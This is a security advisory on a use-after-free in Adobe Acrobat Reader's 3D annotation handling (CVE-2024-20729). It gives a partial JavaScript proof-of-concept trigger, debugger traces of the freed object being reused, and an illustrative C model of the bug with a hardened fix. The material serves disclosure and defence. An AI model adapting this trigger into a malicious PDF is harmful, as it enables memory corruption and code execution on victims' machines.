Talos Vulnerability Report

TALOS-2023-1890

Adobe Acrobat Reader Annot3D object zoom event use-after-free vulnerability

February 15, 2024
CVE Number

CVE-2024-20729

SUMMARY

A use-after-free vulnerability exists in the Annot3D functionality of Adobe Acrobat Reader 2023.006.20380. Specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Adobe Acrobat Reader 2023.006.20380

PRODUCT URLS

Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is often the default PDF reader on a system. It also integrates into web browsers as a plugin for rendering PDFs.

Adobe’s PDF Reader creates an Annot3D object when a page contains a 3D annotation. A use-after-free vulnerability exists in the way Adobe Acrobat Reader manages the lifetime of this Annot3D object. This can be illustrated by the following proof-of-concept code:

function main() {
    main_run++;                                   // run counter maintained in the elided part of the PoC

    t = {toString: set_page};                     // converting t to a primitive invokes set_page

    app.activeDocs[0].getField('Text Field1').setFocus();

    app.activeDocs[0].getPageNthWordQuads(0, t);  // t is coerced here, so set_page runs inside this call
}

function set_page() {
    app.activeDocs[0].pageNum = 4;                // change the current page while getPageNthWordQuads is still executing
}

[...]

function zoomtype() {
    app.activeDocs[0].zoomType = zoomtype.fitV;   // zoom-type change during which the Annot3D object is freed
}

In the above excerpt, the toString property of the object t is set to the callback function set_page. Because t is passed where getPageNthWordQuads expects a number, the script engine converts it to a primitive and thereby invokes set_page while getPageNthWordQuads is still executing; the callback is not fired by the preceding setFocus call, which never touches t. set_page changes the current page, which in turn causes the zoomtype function to run. That zoom-type change frees a number of objects, including the Annot3D object, but the native code that dispatched the event continues to use the freed Annot3D object without any validation. We can observe the following in the debugger (with PageHeap enabled):

eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f79 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6d9:
6ebd2f79 68b8010000      push    1B8h
0:000> p
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f7e esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6de:
6ebd2f7e e80944e4ff      call    AcroRd32!AcroWinMainSandbox+0x4abc (6ea1738c) ; <--------- (1)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f83 esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e3:
6ebd2f83 59              pop     ecx
0:000> dd eax                                                                   ; <---------  (2)
bb502e48  00000000 00000000 00000000 00000000
bb502e58  00000000 00000000 00000000 00000000
bb502e68  00000000 00000000 00000000 00000000
bb502e78  00000000 00000000 00000000 00000000
bb502e88  00000000 00000000 00000000 00000000
bb502e98  00000000 00000000 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=000001b8 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f84 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e4:
6ebd2f84 59              pop     ecx
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f85 esp=0536d8d8 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e5:
6ebd2f85 8bc8            mov     ecx,eax
[...] 

0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f98 esp=0536d8d4 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6f8:
6ebd2f98 ff7010          push    dword ptr [eax+10h]  ds:002b:852e0f70=8dc44eb0
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9b esp=0536d8d0 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fb:
6ebd2f9b 57              push    edi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9c esp=0536d8cc ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fc:
6ebd2f9c 56              push    esi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9d esp=0536d8c8 ebp=0536d9c8 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fd:
6ebd2f9d e86588c500      call    AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc037 (6f82b807) ; <----- (3)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=6f82ba18 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2fa2 esp=0536d8d8 ebp=0536d9c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d702:
6ebd2fa2 eb65            jmp     AcroRd32!CTJPEGReader::operator=+0x2d769 (6ebd3009)
0:000> dd bb502e48                                                                            ; <----- (4)
bb502e48  7043e3c8 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000000
bb502e68  00000000 00000000 00000000 00000000
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  702da7e8 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000

At (1) above, a function is called which calls malloc to allocate 0x1B8 bytes (the size pushed immediately before the call) for the Annot3D object; the new buffer is returned in eax (bb502e48), and at (2) it is still zero-filled. The object is initialized by the call at (3), which receives the buffer address in ecx as its this pointer. At (4) the initialized object can be seen, now beginning with a pointer into the AcroRd32 image consistent with a vtable pointer.

0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x50432b:
6f833afb 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh]                            <------------------- (5)
6f833b01 0fb7f0          movzx   esi,ax
6f833b04 33c0            xor     eax,eax
6f833b06 50              push    eax
6f833b07 e82d4444ff      call    AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39)
6f833b0c 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh]
6f833b12 33c0            xor     eax,eax
6f833b14 85c9            test    ecx,ecx
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000000 edi=00000001
eip=6f833b01 esp=0536d660 ebp=0536d67c iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504331:
6f833b01 0fb7f0          movzx   esi,ax
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b04 esp=0536d660 ebp=0536d67c iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504334:
6f833b04 33c0            xor     eax,eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b06 esp=0536d660 ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504336:
6f833b06 50              push    eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b07 esp=0536d65c ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504337:
6f833b07 e82d4444ff      call    AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39) <--------------- [6]
[...]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4a esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67a:
6f82be4a f6450801        test    byte ptr [ebp+8],1         ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4e esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67e:
6f82be4e 7423            je      AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be50 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc680:
6f82be50 f6450804        test    byte ptr [ebp+8],4         ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be54 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc684:
6f82be54 7510            jne     AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc696 (6f82be66) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be56 esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc686:
6f82be56 8365fc00        and     dword ptr [ebp-4],0  ss:002b:0536d290=ffffffff
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5a esp=0536d280 ebp=0536d294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68a:
6f82be5a 85f6            test    esi,esi
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5c esp=0536d280 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68c:
6f82be5c 7415            je      AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5e esp=0536d280 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68e:
6f82be5e 56              push    esi                             <----------------------------------- [7]
0:000> dd esi
bb502e48  70169d20 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000006
bb502e68  00000002 00000008 00000001 00000001
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  70169d20 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5f esp=0536d27c ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68f:
6f82be5f e81cec1eff      call    AcroRd32!AcroWinMainSandbox+0x81b0 (6ea1aa80)
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa80 esp=0536d278 ebp=0536d294 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AcroWinMainSandbox+0x81b0:
6ea1aa80 55              push    ebp
0:000> pc
eax=70d0283c ebx=852e0f60 ecx=76dc3c50 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa91 esp=0536d26c ebp=0536d274 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
AcroRd32!AcroWinMainSandbox+0x81c1:
6ea1aa91 ff15a8471170    call    dword ptr [AcroRd32!AcroSecurityBailOutImpl+0x32fa88 (701147a8)] ds:002b:701147a8={ntdll!LdrpValidateUserCallTarget (77a988f0)}
0:000> pc
eax=0edb878a ebx=852e0f60 ecx=76dc3c50 edx=00810400 esi=76dc3c50 edi=bb502e48
eip=6ea1aa97 esp=0536d26c ebp=0536d274 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
AcroRd32!AcroWinMainSandbox+0x81c7:
6ea1aa97 ffd6            call    esi {ucrtbase!free (76dc3c50)}               <------------------------------ [8]
0:000> dd bb502e48                                                            <------------------------------ [9]
bb502e48  70169d20 00000000 00000000 ffffffff
bb502e58  00000000 00000000 00000000 00000006
bb502e68  00000002 00000008 00000001 00000001
bb502e78  00000000 00000000 00000000 00000002
bb502e88  8dc44eb0 bb508ff8 00000027 00000000
bb502e98  70169d20 bb514fe8 00000000 00000000
bb502ea8  00000000 00000000 00000000 00000000
bb502eb8  00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=852e0f60 ecx=07ca0000 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa99 esp=0536d26c ebp=0536d274 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
AcroRd32!AcroWinMainSandbox+0x81c9:                   
6ea1aa99 59              pop     ecx
0:000> dd bb502e48                                                                          <------------------------------ [10]
bb502e48  ???????? ???????? ???????? ????????
bb502e58  ???????? ???????? ???????? ????????
bb502e68  ???????? ???????? ???????? ????????
bb502e78  ???????? ???????? ???????? ????????
bb502e88  ???????? ???????? ???????? ????????
bb502e98  ???????? ???????? ???????? ????????
bb502ea8  ???????? ???????? ???????? ????????
bb502eb8  ???????? ???????? ???????? ????????
0:000> pt
eax=00000001 ebx=852e0f60 ecx=bb502e48 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa9c esp=0536d278 ebp=0536d294 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
AcroRd32!AcroWinMainSandbox+0x81cc:
6ea1aa9c c3              ret

At [5] above, the ebx register holds the pointer to the Annot3D object (bb502e48), and the function reads a field at offset 0xBC from it. The method called at [6] eventually reaches the free call at [8]; the pointer handed to free is the object pointer pushed from esi at [7]. [9] shows the object's contents immediately before free executes, and [10] shows the same address after free returns: with PageHeap enabled the freed allocation is decommitted, so the debugger can no longer read it. When the call at [6] returns, the caller reloads the field at offset 0xBC through the now-dangling pointer in ebx without checking whether the object still exists. This can be observed in a debugger at the time of the crash:

0:000> g
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=bb502e48 ecx=6ec7801f edx=00010000 esi=00000001 edi=00000001
eip=6f833b0c esp=0536d660 ebp=0536d67c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c:
6f833b0c 8b8bbc000000    mov     ecx,dword ptr [ebx+0BCh] ds:002b:bb502f04=????????

0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0536d67c 6ebe9a42     8dc44eb0 00000009 bb502e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c
01 0536dbb4 6ebd22e6     8dc44eb0 00000009 a1c24494 AcroRd32!CTJPEGReader::operator=+0x441a2
02 0536dbf4 6f479f3e     8dc44eb0 00000001 6f479ea0 AcroRd32!CTJPEGReader::operator=+0x2ca46
03 0536dc1c 6ea8a20e     0536dcfc 8dc44eb0 0536dc98 AcroRd32!AIDE::PixelPartInfo::operator=+0x14a76e
04 0536dc2c 6ebcde76     00000000 0000088c a1c243f8 AcroRd32!DllCanUnloadNow+0x3f5ee
05 0536dc98 6ebc8745     0536dcfc a1c24240 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x285d6
06 0536dd20 6ebc8577     00000000 0536dd6c 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22ea5
07 0536dd34 6ec7bb5b     8dc44eb0 00000000 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22cd7
08 0536dd50 6ecb7a3a     8cef6f48 a1c242c4 8cef6f48 AcroRd32!CTJPEGReader::operator=+0xd62bb
09 0536dda4 6ecb7493     00000000 8cef6f48 00000000 AcroRd32!CTJPEGReader::operator=+0x11219a
0a 0536ddf8 6ebd5b86     00000001 a1c241c0 00000000 AcroRd32!CTJPEGReader::operator=+0x111bf3
0b 0536dea0 6ebc7d73     00000001 00000001 00000000 AcroRd32!CTJPEGReader::operator=+0x302e6
0c 0536def8 6ebd2544     00000000 6ebd2520 6ebd2510 AcroRd32!CTJPEGReader::operator=+0x224d3
0d 0536df14 6ebd104b     8dc44eb0 a1c240b8 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x2cca4
0e 0536dfd8 6ebd0934     00000001 6ebd0934 00000004 AcroRd32!CTJPEGReader::operator=+0x2b7ab
0f 0536dffc 8f445c90     8dc44eb0 00000004 000001ac AcroRd32!CTJPEGReader::operator=+0x2b094
10 0536e040 8f3fb0bb     8130cfb8 4e1ecff0 506b2ff0 EScript!PlugInMain+0x56820
11 0536e0ac 8f2e2009     8fc78000 0536e20c 0536e0cc EScript!PlugInMain+0xbc4b
12 0536e0f4 8f2b6ba1     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0x36f99
13 0536e140 8f2b650b     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xbb31
14 0536e1e4 8f2dce6b     8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xb49b
15 0536e224 8f2d5521     8fc78000 0536e264 8fccc4ce EScript!mozilla::HashBytes+0x31dfb
16 0536e3fc 8f2d372e     00000000 718baa1e 0536e404 EScript!mozilla::HashBytes+0x2a4b1
17 0536e428 8f2d368f     8fc78000 0536e438 8f4d2d98 EScript!mozilla::HashBytes+0x286be
18 0536e484 8f2d3503     8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x2861f
19 0536e4c0 8f2b8713     8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x28493
1a 0536e510 8f2f18bb     8fc78000 0536e558 00000000 EScript!mozilla::HashBytes+0xd6a3
1b 0536e594 8f40aebb     8fc78000 90129a10 8fc780c0 EScript!mozilla::HashBytes+0x4684b
1c 0536e748 8f40ab14     3fc0cff0 ce18efe0 509bcff0 EScript!PlugInMain+0x1ba4b
1d 0536e794 8f4098f3     3d170fc0 8130cfb8 dc4f0f40 EScript!PlugInMain+0x1b6a4
1e 0536e834 8f47671f     55c8ebc0 8130cfb8 d92def00 EScript!PlugInMain+0x1a483
1f 0536e894 6f35e120     00000000 c0010000 0000000c EScript!PlugInMain+0x872af
20 0536e92c 6f358e03     7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e950
21 0536e97c 6f096fd7     c0010000 0000000c 0536ea28 AcroRd32!AIDE::PixelPartInfo::operator=+0x29633
22 0536e9ac 6f09754a     c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16c767
23 0536ea00 6f35dd9c     c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16ccda
24 0536eab0 6ec69998     7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e5cc
25 0536eb48 6ec697bf     00000060 00000001 6ec697bf AcroRd32!CTJPEGReader::operator=+0xc40f8
26 0536eb68 6ec69741     8dc44eb0 00000001 2aa4af10 AcroRd32!CTJPEGReader::operator=+0xc3f1f
27 0536eb88 6ea970c6     6063cff8 a1c27480 2aa4af50 AcroRd32!CTJPEGReader::operator=+0xc3ea1
28 0536ebe0 6ea95cdf     004aafb2 a1c27318 1d3d3fd0 AcroRd32!DllCanUnloadNow+0x4c4a6
29 0536ec78 6ea9518a     004aafb2 6ea94f77 a1c273b0 AcroRd32!DllCanUnloadNow+0x4b0bf
2a 0536ecd0 6ea1d784     000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x4a56a
2b 0536ecec 75fb0eab     00060130 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
2c 0536ed18 75fa7e5a     6ea1d280 00060130 00000113 USER32!_InternalCallWinProc+0x2b
2d 0536edfc 75fa5bca     6ea1d280 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
2e 0536ee70 75fa5990     00000013 0536ee94 6ea94773 USER32!DispatchMessageWorker+0x22a
2f 0536ee7c 6ea94773     0536eeb0 1d3bdda8 1d3bdda8 USER32!DispatchMessageW+0x10
30 0536ee94 6ea9445e     0536eeb0 a1c27068 1d3bdda8 AcroRd32!DllCanUnloadNow+0x49b53
31 0536ef08 6ea94289     a1c27020 1d3bdda8 00000000 AcroRd32!DllCanUnloadNow+0x4983e
32 0536ef40 6ea13043     a1c270d4 0d466ff8 00000000 AcroRd32!DllCanUnloadNow+0x49669
33 0536efb4 6ea12a5f     6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x773
34 0536f3d8 00cd59d0     6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x18f
35 0536f78c 00d21efa     00af0000 00000000 07cc0018 AcroRd32_exe!IsSandboxedProcess+0x126030
36 0536f7d8 76eefcc9     05004000 76eefcb0 0536f844 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d54a
37 0536f7e8 77a77c6e     05004000 d8baf044 00000000 KERNEL32!BaseThreadInitThunk+0x19
38 0536f844 77a77c3e     ffffffff 77a98c32 00000000 ntdll!__RtlUserThreadStart+0x2f
39 0536f854 00000000     00cd1640 05004000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the crash occurs at 6f833b0c, the instruction immediately following the call at [6], when the freed object pointer in ebx (bb502e48) is dereferenced at offset 0xBC as if it still pointed to a live Annot3D object. PageHeap turns this into an immediate access violation; without it the freed memory normally stays mapped and is handed out to later allocations. Depending on the memory layout of the process, it may therefore be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
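The sequence above, a native handler that dispatches to document JavaScript and then keeps using an annotation object that the script's page change has already destroyed, reduces to a re-entrancy bug during event dispatch. The C program below is an added illustration written for this report; it is not code from Adobe, from the Talos PoC or from the advisory. The Annot3D and Doc structures, the on_zoom hook, the static object pool and the POISON marker are all assumptions chosen so that the stale read is observable deterministically: objects live in a static pool that is never passed to free(), so reading a destroyed slot is well defined and stands in for the ???????? that PageHeap produced above. zoom_vulnerable mirrors the shape at [5] and [6] (cache the object pointer, run the script hook, read a field through the cached pointer); zoom_hardened holds a reference across the dispatch so destruction is deferred until the read is finished.

```c
/* Added example, not from the advisory, Adobe or Talos: models the re-entrant
 * free behind CVE-2024-20729 with assumed names (Annot3D, Doc, on_zoom).
 * Objects live in a static pool instead of the heap so that reading a
 * destroyed slot is defined behaviour and the stale read can be observed. */
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

#define POISON    0xDEADBEEFu   /* written into a slot when its object is destroyed */
#define POOL_SIZE 4

typedef struct Annot3D {
    int      alive;       /* pool slot currently holds a live object */
    unsigned refs;        /* reference count; 0 means destroyed */
    uint32_t view_state;  /* stands in for the field read at [ebx+0BCh] above */
} Annot3D;

static Annot3D pool[POOL_SIZE];

static Annot3D *annot_new(uint32_t view_state) {
    size_t i;
    for (i = 0; i < POOL_SIZE; i++) {
        if (!pool[i].alive) {
            pool[i].alive = 1;
            pool[i].refs = 1;
            pool[i].view_state = view_state;
            return &pool[i];
        }
    }
    return NULL;
}

static void annot_retain(Annot3D *a) { a->refs++; }

/* Dropping the last reference destroys the object: the equivalent of free() at [8]. */
static void annot_release(Annot3D *a) {
    if (--a->refs == 0) {
        a->alive = 0;
        a->view_state = POISON;
    }
}

typedef struct Doc Doc;
struct Doc {
    Annot3D *page_annot[2];    /* the 3D annotation of each page, or NULL */
    int      cur_page;
    void   (*on_zoom)(Doc *);  /* document script run when the zoom type changes */
};

static void doc_init(Doc *d, uint32_t view_state, void (*on_zoom)(Doc *)) {
    d->page_annot[0] = annot_new(view_state);
    d->page_annot[1] = NULL;
    d->cur_page = 0;
    d->on_zoom = on_zoom;
}

/* Leaving a page drops the document's reference to that page's annotation. */
static void doc_set_page(Doc *d, int n) {
    Annot3D *old = d->page_annot[d->cur_page];
    d->page_annot[d->cur_page] = NULL;
    d->cur_page = n;
    if (old) annot_release(old);
}

/* Stand-in for the PoC's set_page(): the script navigates away mid-event. */
static void script_set_page(Doc *d) { doc_set_page(d, 1); }

/* Vulnerable shape ([5]/[6] above): cache the pointer, dispatch to script,
 * then read through the cached pointer without re-validating it. */
static uint32_t zoom_vulnerable(Doc *d) {
    Annot3D *a = d->page_annot[d->cur_page];
    if (!a) return 0;
    d->on_zoom(d);          /* re-entrant: may release the last reference to *a */
    return a->view_state;   /* stale read: yields POISON once *a is destroyed */
}

/* Hardened: own a reference for the duration of the dispatch, so the object
 * cannot be destroyed until this function has finished with it. */
static uint32_t zoom_hardened(Doc *d) {
    Annot3D *a = d->page_annot[d->cur_page];
    uint32_t v;
    if (!a) return 0;
    annot_retain(a);
    d->on_zoom(d);
    v = a->view_state;      /* still live: this frame holds a reference */
    annot_release(a);       /* destruction happens here, after the use */
    return v;
}

int main(void) {
    Doc d;
    doc_init(&d, 0x27, script_set_page);
    printf("vulnerable handler read 0x%08x\n", (unsigned)zoom_vulnerable(&d));
    doc_init(&d, 0x27, script_set_page);
    printf("hardened handler read   0x%08x\n", (unsigned)zoom_hardened(&d));
    return 0;
}
```

Under a real heap the vulnerable handler reads whatever the allocator placed in the freed chunk next, which is the reuse an exploit would aim to control; PageHeap's decommit is what turns that read into the access violation shown above. Holding a reference is one fix; an equivalent one is to re-fetch the annotation from its owner after the dispatch returns and bail out if it is gone, which is the check the crashing code path lacks.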

VENDOR RESPONSE

